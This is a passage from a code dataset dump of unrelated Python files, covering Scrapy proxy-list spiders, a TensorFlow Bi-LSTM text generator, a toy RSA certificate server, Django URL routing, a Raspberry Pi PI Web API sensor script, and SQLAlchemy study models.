True:\r\n min = Minimize(WSFA)\r\n outputFile.write(print_FSM( min.automata ))\r\n\r\nelse:\r\n WSFA.create_sorted_automata()\r\n outputFile.write(print_FSM( WSFA.automata ))\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n\r\nexit(0)\r\n","sub_path":"minimize_automata/mka.py","file_name":"mka.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"535608855","text":"\n#coding:utf-8\nimport time\nfrom scrapy.http import Request\nfrom scrapy.spiders import Spider\nfrom urlparse import urljoin\nfrom ..DaiLi import DailiItem\nfrom ..DaiLi import DailiItem1\nfrom urlparse import urljoin\n\nclass Daili(Spider):\n\tname = \"daili\"\n\tallowd_domains = \".proxy360.cn\"\n\tstart_urls = [\"http://www.proxy360.cn/Proxy\"]\n\n\tdef parse(self, response):\n\t\t# items = []\n\t\tip = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[1]/text()''').extract()\n\t\tport = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[2]/text()''').extract()\n\t\tzone = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[4]/text()''').extract()\n\t\ttime = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[last()]/text()''').extract()\n\t\tfor i in zip(ip, port, zone, time):\n\t\t\t# print i[0], i[1], i[2], i[3]\n\t\t\titem = DailiItem()\n\t\t\titem[\"ip\"] = ''.join(i[0]).strip()\n\t\t\titem['port'] = ''.join(i[1]).strip()\n\t\t\titem['zone'] = ''.join(i[2]).strip()\n\t\t\titem['time'] = ''.join(i[3]).strip()\n\t\t\t# items.append(item)\n\t\t\tyield item\n\nclass Daili1(Spider):\n\n\tname = \"daili1\"\n\tallowd_domains = \"youdaili.net\"\n\tstart_urls = [\"http://www.youdaili.net/Daili/http/\"]\n\n\tdef parse(self, response):\n\t\turls = response.url\n\t\tmeta = {\n\t\t\"urls\":urls,\n\t\t}\n\t\tlink = response.xpath('''//ul[@class=\"newslist_line\"]/li/a/@href''').extract()\n\t\tfor lin in link:\n\t\t\t# print lin,\"SSSSSSSSSSSSSSSSSSSSSSSsss\"\n\t\t\tyield Request(lin, callback=self.inof, meta=meta)\n\t\tnext_link = response.xpath('''//ul[@class=\"pages_ulstyle\"]/li[last()-2]/a/@href''').extract()\n\t\tif next_link:\n\t\t\t# print next_link, \"dddddddddddddddddddd\"\n\t\t\tyield Request(urljoin(urls, ''.join(next_link)), callback=self.parse)\n\n\tdef inof(self, response):\n\t\t#urls = response.meta[\"urls\"]\n\t\turls = \"http://www.youdaili.net/Daili/http/\"\n\t\tip = response.xpath('''//div[@class=\"cont_font\"]//p//text()[position()>0 and position()<151]''').extract()\n\t\taddtime = ''.join(response.xpath('''//div[@class=\"cont_time\"]/text()[1]''').re(u'''发布时间:(\\S+)'''))\n\t\titem = DailiItem1()\n\t\tfor i in ip:\n\t\t\titem[\"ip\"] = ''.join(i).split(\":\")[0].strip()\n\t\t\titem['port'] = ''.join(i).split(\":\")[1].split(\"@\")[0].strip()\n\t\t\titem['zone'] = ''.join(i).split(\"@\")[1].strip()\n\t\t\titem['spidertime'] = time.strftime(\"%Y-%m-%d\", time.localtime())\n\t\t\titem['addtime'] = addtime\n\t\t\tyield item \n\t\tlink = response.xpath('''//ul[@class=\"pagelist\"]/li[last()]/a/@href''').extract()\n\t\tif link:\n\t\t\tyield Request(urljoin(urls, ''.join(link)),callback=self.inof)\n","sub_path":"daili/spiders/daili.py","file_name":"daili.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329338360","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 25 15:01:46 2018\r\n\r\n@author: 47532\r\n\"\"\"\r\n\r\nimport re\r\nimport regex\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nimport numpy as np\r\nimport copy\r\nfrom tensorflow.contrib import rnn\r\nfrom tqdm import tqdm\r\n\r\ndef get_data():\r\n with open('comment1', encoding='utf8', mode='r') as rfile:\r\n words = []\r\n sentences = []\r\n def repl(m):\r\n inner_word = list(m.group(0))\r\n return \" \" + ''.join(inner_word) + \" \"\r\n for line in rfile:\r\n line = line.lower()\r\n line = re.sub(r'<.*>', ' ', line)\r\n line = re.sub('[\\s+\\.\\!\\?\\,\\/_,$%^*(+\\\"\\:\\-\\@\\#\\&)]+', \" \", line)\r\n sentence = regex.sub(r'\\p{So}\\p{Sk}*', repl, line)\r\n word = sentence.split() \r\n if len(word) > 1:\r\n if \"'\" in word:\r\n word.remove(\"'\")\r\n else: \r\n word = word\r\n words.extend(word)\r\n sentences.append(word) \r\n else:\r\n continue \r\n words_sort = pd.DataFrame(words)[0].value_counts() \r\n #words_sort = words_sort[words_sort>1] \r\n word_bank = list(words_sort.index)\r\n #word_bank = list(set(words))\r\n word2id = {} # word => id 的映射\r\n for i in range(len(word_bank)):\r\n word2id[word_bank[i]] = i+1 \r\n word2id['EOS'] = len(word_bank)+1 # Word2id中增加‘EOS'\r\n inputs = [] \r\n for sent in sentences: # 输入是多个句子,这里每个循环处理一个句子\r\n input_sent = []\r\n for i in range(sent.__len__()): # 处理单个句子中的每个单词\r\n input_id = word2id.get(sent[i])\r\n if not input_id: # 如果单词不在词典中,则跳过\r\n continue\r\n input_sent.append(input_id)\r\n input_sent.append(len(word_bank)+1) # 每个句子末尾添加'EOS'\r\n if len(input_sent) > 21:\r\n input_sent = [input_sent[i:i+20] for i in range(0,len(input_sent),20)]\r\n inputs.extend(input_sent)\r\n else:\r\n inputs.append(input_sent)\r\n #pad = np.mean([len(x) for x in inputs])\r\n pad = len(max(inputs, key=len))\r\n inputs = [i + [0]*(pad-len(i)) for i in inputs]\r\n return word_bank, pad, inputs, len(word2id)+1, word2id\r\nword_bank, sen_length, inputs, vocab_size, word2id = get_data()\r\n\r\nclass TrainData:\r\n def __init__(self, inputs, batch_size, sen_length):\r\n self.inputs = inputs\r\n self.batch_size = batch_size\r\n self.sen_length = sen_length\r\n self.n = len(inputs) \r\n def get_batch_data(self, batch):\r\n global batch_size\r\n start_pos = batch * self.batch_size\r\n end_pos = min((batch + 1) * self.batch_size, self.n)\r\n xdata = self.inputs[start_pos:end_pos]\r\n # target data 左移一位\r\n ydata = copy.deepcopy(self.inputs[start_pos:end_pos])\r\n for row in ydata:\r\n b = row.pop(0)\r\n row.append(b) \r\n x_batch = np.array(xdata, dtype=np.int32)\r\n y_batch = np.array(ydata, dtype=np.int32)\r\n return x_batch, y_batch\r\n def get_num_batches(self):\r\n return max(self.n - 1, 0) // self.batch_size \r\n \r\nbatch_size = 128\r\ntrain_data = TrainData(inputs, batch_size, sen_length) #inputs, batch_size, sen_length\r\nprint('Train size: %s' % (train_data.get_num_batches()*batch_size))\r\nprint('Vocab_size: %s' % vocab_size) \r\n\r\ndef build_inputs(num_steps):\r\n # num_seqs: 每个batch中的序列个数\r\n # num_steps: 每个序列包含的字符数\r\n inputs = tf.placeholder(tf.int32, shape=[None, num_steps], name='inputs')\r\n targets = tf.placeholder(tf.int32, shape=[None, num_steps], name='targets')\r\n return inputs, targets\r\n\r\ndef build_lstm(hidden_dim, num_layers, batch_size, dropout_rate,sampling):\r\n # hidden_dim: lstm隐层中结点数目\r\n # num_layers: lstm的隐层数目\r\n # lstm cell\r\n lstm_cell_fw = rnn.BasicLSTMCell(hidden_dim, forget_bias=1.0, state_is_tuple=True)\r\n lstm_cell_bw = rnn.BasicLSTMCell(hidden_dim, forget_bias=1.0, state_is_tuple=True) \r\n # 添加dropout\r\n if sampling == False:\r\n lstm_cell_fw = rnn.DropoutWrapper(lstm_cell_fw, output_keep_prob=(1 - dropout_rate))\r\n lstm_cell_bw = rnn.DropoutWrapper(lstm_cell_bw, output_keep_prob=(1 - dropout_rate))\r\n # 堆叠\r\n lstm_cell_fw = rnn.MultiRNNCell([lstm_cell_fw] * num_layers, state_is_tuple=True)\r\n lstm_cell_bw = rnn.MultiRNNCell([lstm_cell_bw] * num_layers, state_is_tuple=True)\r\n initial_state_fw = lstm_cell_fw.zero_state(batch_size, tf.float32)\r\n initial_state_bw = lstm_cell_bw.zero_state(batch_size, tf.float32) \r\n return lstm_cell_fw, lstm_cell_bw, initial_state_fw, initial_state_bw\r\n\r\ndef build_output(lstm_output, hidden_dim, vocab_size, lambd, num_batches):\r\n outputs = tf.reshape(tf.concat(lstm_output,1), [-1, hidden_dim * 2])\r\n # 将lstm层与softmax层全连接\r\n with tf.variable_scope('softmax'):\r\n softmax_w = tf.get_variable(\"softmax_w\", shape = [hidden_dim * 2, vocab_size], \r\n regularizer=tf.contrib.layers.l2_regularizer(scale=lambd / num_batches), \r\n initializer = tf.random_uniform_initializer(-1,1,seed=1))\r\n softmax_b = tf.get_variable(\"softmax_b\", initializer = tf.zeros([vocab_size])) \r\n # 计算logits\r\n logits = tf.matmul(outputs, softmax_w) + softmax_b \r\n # softmax层返回概率分布\r\n preds = tf.nn.softmax(logits, name='predictions') \r\n return preds, logits\r\n\r\ndef build_loss(logits, targets): \r\n # Softmax cross entropy loss \r\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tf.reshape(targets, [-1]), logits = logits)) \r\n return loss\r\n\r\ndef build_optimizer(loss, learning_rate):\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss) \r\n return optimizer\r\n\r\nclass Bi_LSTM: \r\n def __init__(self, vocab_size, batch_size, \r\n num_batches, num_steps=sen_length, embedding_size=32, hidden_dim=30, \r\n num_layers=1, learning_rate=0.01, lambd=0.01, dropout_rate=0.5, sampling=True):\r\n self.lr = learning_rate\r\n self.lambd = lambd\r\n self.dropout_rate = dropout_rate \r\n self.num_layers = num_layers \r\n self.num_batches = num_batches\r\n self.embedding_size = embedding_size\r\n self.hidden_dim = hidden_dim \r\n self.vocab_size = vocab_size\r\n if sampling == True:\r\n self.batch_size, self.num_steps = 1, 1\r\n else:\r\n self.batch_size, self.num_steps = batch_size, num_steps\r\n \r\n tf.reset_default_graph() \r\n # 输入层\r\n self.inputs = tf.placeholder(tf.int32, shape=[None, self.num_steps], name='inputs')\r\n self.targets = tf.placeholder(tf.int32, shape=[None, self.num_steps], name='targets')\r\n # LSTM层\r\n lstm_cell_fw, lstm_cell_bw, self.initial_state_fw, self.initial_state_bw = build_lstm(self.hidden_dim, self.num_layers, self.batch_size, self.dropout_rate, sampling)\r\n # 对输入进行one-hot编码\r\n self.embedding = tf.get_variable(\"embedding\", shape=[self.vocab_size, self.embedding_size],\r\n regularizer=tf.contrib.layers.l2_regularizer(scale=self.lambd / self.num_batches),\r\n initializer=tf.random_uniform_initializer(-1,1,seed=1))\r\n self.inputs_emb = tf.nn.embedding_lookup(self.embedding, self.inputs)\r\n self.inputs_emb = tf.unstack(self.inputs_emb, self.num_steps, 1)\r\n # 运行RNN\r\n outputs, self.final_state_fw, self.final_state_bw = rnn.static_bidirectional_rnn(lstm_cell_fw, lstm_cell_bw, self.inputs_emb, \r\n initial_state_fw = self.initial_state_fw, initial_state_bw = self.initial_state_bw, dtype=tf.float32)\r\n # softmax prediction probability\r\n self.prediction, self.logits = build_output(outputs, self.hidden_dim, self.vocab_size, self.lambd, self.num_batches)\r\n # Loss 和 optimizer (with gradient clipping)\r\n self.loss = build_loss(self.logits, self.targets)\r\n self.optimizer = build_optimizer(self.loss, self.lr)\r\n \r\n#%% ===================================训练数据 ============================= \r\nnum_batches = train_data.get_num_batches()\r\nmodel = Bi_LSTM(vocab_size, batch_size, num_batches, sampling=False)\r\n\r\nepochs = 20\r\nwith tf.Session() as sess:\r\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\r\n writer = tf.summary.FileWriter('./comments_model/bi_LSTM', sess.graph) # self.global_step.eval(session=sess)\r\n step = 0\r\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)\r\n new_state_fw, new_state_bw = sess.run([model.initial_state_fw, model.initial_state_bw])\r\n for index in range(epochs): \r\n total_loss = 0.0\r\n for batch in tqdm(range(num_batches)):\r\n batch_inputs,batch_targets = train_data.get_batch_data(batch)\r\n #  生成供tensorflow训练用的数据\r\n feed = {model.inputs: batch_inputs, model.targets: batch_targets, model.initial_state_fw: new_state_fw, model.initial_state_bw: new_state_bw}\r\n batch_loss, new_state_fw, new_state_bw, _ = sess.run([model.loss, model.final_state_fw, model.final_state_bw, model.optimizer], feed_dict=feed)\r\n total_loss += batch_loss\r\n step += 1\r\n if step % 100 == 0:\r\n saver.save(sess, './comments_model/bi_LSTM/', global_step=step)\r\n if step % 10000 == 0:\r\n print(step)\r\n print('Train Loss at step {}: {:5.6f}'.format(index+1, total_loss / num_batches))\r\n\r\n#%% ===================================生成句子 ============================= \r\ndef pick_top_n(preds, vocab_size, top_n=10):\r\n # 从预测结果中选取前top_n个最可能的字符\r\n p = np.squeeze(preds)\r\n #p1 = list(p)\r\n #c = p1.index(max(p1))\r\n p = p[1:]\r\n # 将除了top_n个预测值的位置都置为0\r\n p[np.argsort(p)[:-top_n]] = 0\r\n # 归一化概率\r\n p = p / np.sum(p)\r\n # 随机选取一个字符\r\n c = np.random.choice(vocab_size-1, 1, p=p)[0]+1\r\n return c\r\n \r\ndef sample(n_words, vocab_size, batch_size, num_batches, prime):\r\n #prime: 起始文本 \r\n samples=[prime]\r\n # sampling=True意味着batch的size=1 x 1\r\n model = Bi_LSTM(vocab_size, batch_size, num_batches, sampling=True)\r\n saver = tf.train.Saver()\r\n with tf.Session() as sess:\r\n # 加载模型参数,恢复训练\r\n checkpoint_file = tf.train.latest_checkpoint('./comments_model/bi_LSTM')\r\n saver.restore(sess, checkpoint_file)\r\n new_state_fw, new_state_bw = sess.run([model.initial_state_fw, model.initial_state_bw]) \r\n # 不断生成字符,直到达到指定数目\r\n c = word2id.get(prime)\r\n for i in range(n_words):\r\n test_word_id = c\r\n if test_word_id == word2id.get('EOS'):\r\n break\r\n else:\r\n feed = {model.inputs: [[test_word_id]],\r\n model.initial_state_fw: new_state_fw, model.initial_state_bw: new_state_bw}\r\n #preds= sess.run([model.prediction], feed_dict=feed)\r\n preds, new_state_fw, new_state_bw = sess.run([model.prediction, model.final_state_fw, model.final_state_bw], feed_dict=feed)\r\n c = pick_top_n(preds, vocab_size)\r\n samples.extend(x for x,v in word2id.items() if v==c) \r\n print(' '.join(samples))\r\n \r\nfor i in range(5): \r\n #sample(10, vocab_size, batch_size, num_batches, prime = \"you\")\r\n for j in [\"thank\", \"beautiful\", \"very\", \"bro\", \"this\",\"you\" ]:\r\n sample(20, vocab_size, batch_size, num_batches, prime = j)\r\n\r\n","sub_path":"language models/Bi-LSTM.py","file_name":"Bi-LSTM.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235838956","text":"import socket\nimport sys\nimport util\n\nfrom sympy.crypto.crypto import rsa_private_key, rsa_public_key\n\n\n\ndef start():\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n server_address = (util.TTP_address, util.TTP_listen_port)\n print('starting up on {} port {}'.format(*server_address))\n sock.bind(server_address)\n\n # Listen for incoming connections\n while True:\n sock.listen(1)\n while True:\n # Wait for a connection\n print('TTP: waiting for a connection')\n connection, client_address = sock.accept()\n client_msg = bytearray()\n\n print('TTP: connection from', client_address)\n\n # Receive the data in small chunks and retransmit it\n while True:\n data = connection.recv(1024)\n print('TTP: received {!r}'.format(data))\n client_msg = \"\".join(util.bytesToStringArr(data))\n if(client_msg==util.signRequest):\n connection.sendall(util.numbersToByteArr([\"OK\"]))\n data = connection.recv(1024) # get len(name)(4 byte)|name|PK(128 byte)\n ln = int.from_bytes(data[:4], byteorder='big')\n name = int.from_bytes(data[4:4+ln], byteorder='big')\n pk = int.from_bytes(data[4+ln:4+ln+128], byteorder='big')\n sig = util.RSA_decrypt(util.H512([name,pk])% util.rsa_N, util.rsa_prk)\n signedCert = util.rsa_N.to_bytes(128,byteorder='big')+sig.to_bytes(128,byteorder='big')\n connection.sendall(signedCert)\n elif(client_msg==util.keyRequest):\n response = util.rsa_N.to_bytes(128,byteorder='big')+util.rsa_e.to_bytes(128,byteorder='big')\n connection.sendall(response)\n connection.close()\n break\n\n\ndef main():\n util.RSA_keyGeneration(17)\n start()\n\nmain()\n","sub_path":"TTP.py","file_name":"TTP.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"177953754","text":"\n\"\"\"Script for creating a secret key\n\nAttributes\n----------\nCHARS : str\n Valid characters for a django secret key: a-z, 0-9, !@#$%^&*(-_=+)\n (No capitals)\n\"\"\"\n\nimport secrets\nimport json\n\n\nCHARS = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'\n\n\ndef new_key(target=\"key.json\"):\n \"\"\"Generate a new key file, in the form of a JSON with one entry (``key``).\n\n Parameters\n ----------\n target : str\n Name of the file to generate; defaults to key.json\n \"\"\"\n\n key = \"\".join([secrets.choice(CHARS) for i in range(50)])\n print(\"Created new secret key: \" + key)\n\n with open(target, \"w+\") as keyfile:\n keyfile.write(json.dumps({\"key\": key}))\n\n\nif __name__ == '__main__':\n new_key()\n","sub_path":"checkin/new_key.py","file_name":"new_key.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534350102","text":"from django.conf import settings\nfrom django.conf.urls import *\nfrom django.urls import path\nfrom django.contrib import admin\nfrom django.views.generic.base import TemplateView\nfrom djoser.views import UserViewSet, TokenCreateView\nfrom rest_framework import routers\n\nimport manabi.views\nfrom manabi.apps.flashcards.api_views import (\n DeckViewSet,\n SynchronizedDeckViewSet,\n SharedDeckViewSet,\n SuggestedSharedDecksViewSet,\n ManabiReaderFactViewSet,\n FactViewSet,\n CardViewSet,\n)\nfrom manabi.apps.manabi_auth.api_views import (\n AppleLoginView,\n exchange_token,\n)\nfrom manabi.apps.review_results.api_views import ReviewResultsView\n\n\napi_router = routers.DefaultRouter()\napi_router.register(r'flashcards/decks',\n DeckViewSet,\n basename='deck')\napi_router.register(r'flashcards/synchronized_decks',\n SynchronizedDeckViewSet,\n basename='synchronized-deck')\napi_router.register(r'flashcards/suggested_shared_decks',\n SuggestedSharedDecksViewSet,\n basename='suggested-shared-deck')\napi_router.register(r'flashcards/shared_decks',\n SharedDeckViewSet,\n basename='shared-deck')\napi_router.register(r'flashcards/facts',\n FactViewSet,\n basename='fact')\napi_router.register(r'flashcards/manabi_reader_facts',\n ManabiReaderFactViewSet,\n basename='fact')\napi_router.register(r'flashcards/cards',\n CardViewSet,\n basename='card')\n\nurlpatterns = [\n url(r'^apple-app-site-association$', TemplateView.as_view(\n template_name='apple_app_site_association.json',\n content_type='application/json',\n )),\n\n url(r'^ios-required/', TemplateView.as_view(\n template_name='ios_required.html'), name='ios-required'),\n\n url(r'^accounts/', include('allauth.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'impersonate/', include('impersonate.urls')),\n url(r'^rq/', include('django_rq.urls')),\n\n url(r'^$', manabi.views.homepage, name='homepage'),\n url(r'^flashcards/', include('manabi.apps.flashcards.urls')),\n url(r'^reader_feeds/', include('manabi.apps.reader_feeds.urls')),\n url(r'^users/', include('manabi.apps.profiles.urls')),\n\n url(r'^terms-of-service/$', TemplateView.as_view(\n template_name='tos.html'), name='terms_of_service'),\n url(r'^privacy-policy/$', TemplateView.as_view(\n template_name='privacy.html'), name='privacy_policy'),\n url(r'^credits/$', TemplateView.as_view(\n template_name='credits.html'), name='credits'),\n\n # API URLs.\n url(r'^api/', include((api_router.urls, 'api'))),\n\n path('api/dj-rest-auth/', include('dj_rest_auth.urls')),\n # path('api/dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))\n path('api/dj-rest-auth/apple/', AppleLoginView.as_view()),\n\n url(r'^api/auth/social_login/(?P\\S+)/$', exchange_token),\n url(r'^api/auth/users/create/', UserViewSet.as_view({'post': 'create'})),\n url(r'^api/auth/token/create/', TokenCreateView.as_view()),\n url(r'^api/auth/', include('djoser.urls')),\n url(r'^api/auth/', include('djoser.urls.authtoken')),\n\n url(r'^api/flashcards/', include('manabi.apps.flashcards.api_urls')),\n url(r'^api/flashcards/review_results/',\n include('manabi.apps.review_results.api_urls')),\n url(r'^api/subscriptions/', include('manabi.apps.subscriptions.api_urls')),\n url(r'^api/furigana/', include('manabi.apps.furigana.urls')),\n url(r'^api/twitter_usages/', include('manabi.apps.twitter_usages.urls')),\n url(r'^api/word_tracking/', include('manabi.apps.word_tracking.api_urls')),\n]\n\n# if not settings.LIVE_HOST:\n# urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\nif 'silk' in settings.INSTALLED_APPS:\n urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\n","sub_path":"manabi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579346961","text":"from signal import *\nimport atexit\nimport helpers\nimport resources\nimport sys\nimport temperature_sensor\nimport time\n\nimport part1\nimport part2\nimport part3\nimport part4\n\n# Type in your Raspberry Pi's name, description, and location here\nname = \"Example Raspberry Pi Name (dont use me!)\"\ndescription = \"This is my raspberry pi!\"\nposition_x = -1\nposition_y = -1\n\n# (Set up some helpers to clean up when we finish running):\npermit_cleanup = True\natexit.register(lambda: helpers.perform_part5_cleanup(name, permit_cleanup))\nfor sig in (SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGHUP):\n signal(sig, lambda x, y: helpers.perform_part5_cleanup(name, permit_cleanup))\n\nif __name__ == \"__main__\":\n # First, we need to create a PI Point:\n pipoint_response = part1.create_pipoint(\n name,\n resources.base_url,\n resources.dataserver_web_id)\n\n # (We check that the PI Point was successfully created before continuing):\n if pipoint_response.text != \"\":\n permit_cleanup = False\n print(pipoint_response.text)\n\n # (We need the PI Point WebId later, so we get it now):\n pipoint_web_id = helpers.get_web_id(pipoint_response)\n\n # Second, we need to create an AF Element:\n element_response = part2.create_af_element(\n name,\n description,\n resources.base_url,\n resources.parent_af_element_web_id)\n \n # (Here, we retrieve the WebIds for the X and Y coordinate attributes):\n coordinate_web_ids = helpers.get_coordinate_locations(element_response)\n\n # Third, we update the X and Y coordinates to match our location:\n part3.update_af_attribute(\n position_x,\n resources.base_url,\n coordinate_web_ids.x_web_id)\n part3.update_af_attribute(\n position_y,\n resources.base_url,\n coordinate_web_ids.y_web_id)\n\n # (Here, we retrieve the WebId for the Temperature attribute):\n value_web_id = helpers.get_attribute_web_id_by_name(\n \"Temperature\",\n resources.base_url,\n helpers.get_web_id(element_response))\n\n # Finally, we read the temperature from the temperature sensor, and POST\n # the value to the PI Point:\n sensor = temperature_sensor.TemperatureSensor()\n while True:\n current_temperature = sensor.read_temp()\n print(\"Sending: \" + str(current_temperature))\n part4.post_pi_value(\n current_temperature,\n pipoint_web_id,\n resources.base_url)\n print(\"Received: \" + str(helpers.get_attribute_field(\n value_web_id,\n lambda x: x[\"Value\"])))\n time.sleep(5)\n\n \n \n","sub_path":"Instructor Copies/Exercise1/part5.py","file_name":"part5.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416449580","text":"import pandas as pd\nimport scipy.stats as st\nimport numpy as np\n\ndef ta_chip(high, low, close, volume, window):\n price_dist = (close-(high+low)/2)**2\n new_vol = price_dist * volume\n chip_avg = pd.Series(np.nan, index=close.index)\n chip_score = pd.Series(np.nan, index=close.index)\n #\n for i in range(window-1, close.shape[0]):\n newvol_col = new_vol.iloc[i-window+1:i+1]\n weight = newvol_col / newvol_col.sum()\n price_weight = close.iloc[i-window+1:i+1] * weight\n chip_avg.iloc[i] = price_weight.sum()\n z_score = (close.iloc[i] - chip_avg.iloc[i]) / close.iloc[i-window+1:i+1].std()\n p_values = st.norm.cdf(z_score)\n chip_score.iloc[i] = p_values\n #\n return chip_avg, chip_score","sub_path":"dev/yfissue_1/lambda_new_talib.py","file_name":"lambda_new_talib.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"405427457","text":"import marshmallow\nfrom marshmallow import INCLUDE, fields\nfrom marshmallow_enum import EnumField\nfrom sqlalchemy import func\n\nfrom crc import db, ma\nfrom crc.api.common import ApiErrorSchema\nfrom crc.models.file import FileModel, SimpleFileSchema, FileSchema\nfrom crc.models.protocol_builder import ProtocolBuilderStatus, ProtocolBuilderStudy\nfrom crc.models.workflow import WorkflowSpecCategoryModel, WorkflowState, WorkflowStatus, WorkflowSpecModel, \\\n WorkflowModel\n\n\nclass StudyModel(db.Model):\n __tablename__ = 'study'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String)\n last_updated = db.Column(db.DateTime(timezone=True), default=func.now())\n protocol_builder_status = db.Column(db.Enum(ProtocolBuilderStatus))\n primary_investigator_id = db.Column(db.String, nullable=True)\n sponsor = db.Column(db.String, nullable=True)\n hsr_number = db.Column(db.String, nullable=True)\n ind_number = db.Column(db.String, nullable=True)\n user_uid = db.Column(db.String, db.ForeignKey('user.uid'), nullable=False)\n investigator_uids = db.Column(db.ARRAY(db.String), nullable=True)\n requirements = db.Column(db.ARRAY(db.Integer), nullable=True)\n on_hold = db.Column(db.Boolean, default=False)\n\n def update_from_protocol_builder(self, pbs: ProtocolBuilderStudy):\n self.hsr_number = pbs.HSRNUMBER\n self.title = pbs.TITLE\n self.user_uid = pbs.NETBADGEID\n self.last_updated = pbs.DATE_MODIFIED\n\n self.protocol_builder_status = ProtocolBuilderStatus.ACTIVE\n if pbs.HSRNUMBER:\n self.protocol_builder_status = ProtocolBuilderStatus.OPEN\n if self.on_hold:\n self.protocol_builder_status = ProtocolBuilderStatus.HOLD\n\n\nclass WorkflowMetadata(object):\n def __init__(self, id, name, display_name, description, spec_version, category_id, state: WorkflowState, status: WorkflowStatus,\n total_tasks, completed_tasks, display_order):\n self.id = id\n self.name = name\n self.display_name = display_name\n self.description = description\n self.spec_version = spec_version\n self.category_id = category_id\n self.state = state\n self.status = status\n self.total_tasks = total_tasks\n self.completed_tasks = completed_tasks\n self.display_order = display_order\n\n\n @classmethod\n def from_workflow(cls, workflow: WorkflowModel):\n instance = cls(\n id=workflow.id,\n name=workflow.workflow_spec.name,\n display_name=workflow.workflow_spec.display_name,\n description=workflow.workflow_spec.description,\n spec_version=workflow.spec_version(),\n category_id=workflow.workflow_spec.category_id,\n state=WorkflowState.optional,\n status=workflow.status,\n total_tasks=workflow.total_tasks,\n completed_tasks=workflow.completed_tasks,\n display_order=workflow.workflow_spec.display_order\n )\n return instance\n\n\nclass WorkflowMetadataSchema(ma.Schema):\n state = EnumField(WorkflowState)\n status = EnumField(WorkflowStatus)\n class Meta:\n model = WorkflowMetadata\n additional = [\"id\", \"name\", \"display_name\", \"description\",\n \"total_tasks\", \"completed_tasks\", \"display_order\"]\n unknown = INCLUDE\n\n\nclass Category(object):\n def __init__(self, model: WorkflowSpecCategoryModel):\n self.id = model.id\n self.name = model.name\n self.display_name = model.display_name\n self.display_order = model.display_order\n\n\nclass CategorySchema(ma.Schema):\n workflows = fields.List(fields.Nested(WorkflowMetadataSchema), dump_only=True)\n class Meta:\n model = Category\n additional = [\"id\", \"name\", \"display_name\", \"display_order\"]\n unknown = INCLUDE\n\n\nclass Study(object):\n\n def __init__(self, title, last_updated, primary_investigator_id, user_uid,\n id=None,\n protocol_builder_status=None,\n sponsor=\"\", hsr_number=\"\", ind_number=\"\", categories=[],\n files=[], approvals=[], **argsv):\n self.id = id\n self.user_uid = user_uid\n self.title = title\n self.last_updated = last_updated\n self.protocol_builder_status = protocol_builder_status\n self.primary_investigator_id = primary_investigator_id\n self.sponsor = sponsor\n self.hsr_number = hsr_number\n self.ind_number = ind_number\n self.categories = categories\n self.approvals = approvals\n self.warnings = []\n self.files = files\n\n @classmethod\n def from_model(cls, study_model: StudyModel):\n id = study_model.id # Just read some value, in case the dict expired, otherwise dict may be empty.\n args = dict((k, v) for k, v in study_model.__dict__.items() if not k.startswith('_'))\n instance = cls(**args)\n return instance\n\n def update_model(self, study_model: StudyModel):\n for k,v in self.__dict__.items():\n if not k.startswith('_'):\n study_model.__dict__[k] = v\n\n def model_args(self):\n \"\"\"Arguments that can be passed into the Study Model to update it.\"\"\"\n self_dict = self.__dict__.copy()\n del self_dict[\"categories\"]\n del self_dict[\"warnings\"]\n return self_dict\n\n\nclass StudySchema(ma.Schema):\n\n id = fields.Integer(required=False, allow_none=True)\n categories = fields.List(fields.Nested(CategorySchema), dump_only=True)\n warnings = fields.List(fields.Nested(ApiErrorSchema), dump_only=True)\n protocol_builder_status = EnumField(ProtocolBuilderStatus)\n hsr_number = fields.String(allow_none=True)\n sponsor = fields.String(allow_none=True)\n ind_number = fields.String(allow_none=True)\n files = fields.List(fields.Nested(FileSchema), dump_only=True)\n approvals = fields.List(fields.Nested('ApprovalSchema'), dump_only=True)\n\n class Meta:\n model = Study\n additional = [\"id\", \"title\", \"last_updated\", \"primary_investigator_id\", \"user_uid\",\n \"sponsor\", \"ind_number\", \"approvals\", \"files\"]\n unknown = INCLUDE\n\n @marshmallow.post_load\n def make_study(self, data, **kwargs):\n \"\"\"Can load the basic study data for updates to the database, but categories are write only\"\"\"\n return 